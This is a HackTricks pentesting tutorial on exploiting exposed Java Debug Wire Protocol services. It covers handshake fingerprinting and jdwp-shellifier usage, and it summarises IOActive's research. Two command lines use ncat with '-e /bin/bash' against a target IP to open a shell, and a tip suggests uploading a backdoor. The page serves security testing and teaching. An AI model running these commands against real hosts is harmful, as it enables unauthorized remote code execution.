6.4 KiB
Pentesting JDWP - Java Debug Wire Protocol
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Exploiting
JDWP exploitation hinges on the protocol's lack of authentication and encryption. It's generally found on port 8000, but other ports are possible. The initial connection is made by sending a "JDWP-Handshake" to the target port. If a JDWP service is active, it responds with the same string, confirming its presence. This handshake acts as a fingerprinting method to identify JDWP services on the network.
In terms of process identification, searching for the string "jdwk" in Java processes can indicate an active JDWP session.
The go-to tool is jdwp-shellifier. You can use it with different parameters:
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
I found that the use of --break-on 'java.lang.String.indexOf'
make the exploit more stable. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
More details
This is a summary of https://ioactive.com/hacking-java-debug-wire-protocol-or-how/. Check it for further details.
-
JDWP Overview:
- It's a packet-based network binary protocol, primarily synchronous.
- Lacks authentication and encryption, making it vulnerable when exposed to hostile networks.
-
JDWP Handshake:
- A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server).
-
JDWP Communication:
- Messages have a simple structure with fields like Length, Id, Flag, and CommandSet.
- CommandSet values range from 0x40 to 0x80, representing different actions and events.
-
Exploitation:
- JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks.
- The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods.
-
Real-Life Exploitation:
- Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub.
- The exploit script was tested against various JDK versions and is platform-independent, offering reliable Remote Code Execution (RCE).
-
Security Implications:
- The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations.
References:
- [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]
- https://github.com/IOActive/jdwp-shellifier
- http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
- http://www.secdev.org/projects/scapy(no longer active)
- http://www.shodanhq.com/search?q=JDWP-HANDSHAKE
- http://www.hsc-news.com/archives/2013/000109.html (no longer active)
- http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt
- https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
- http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
- http://nmap.org/nsedoc/scripts/jdwp-exec.html
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.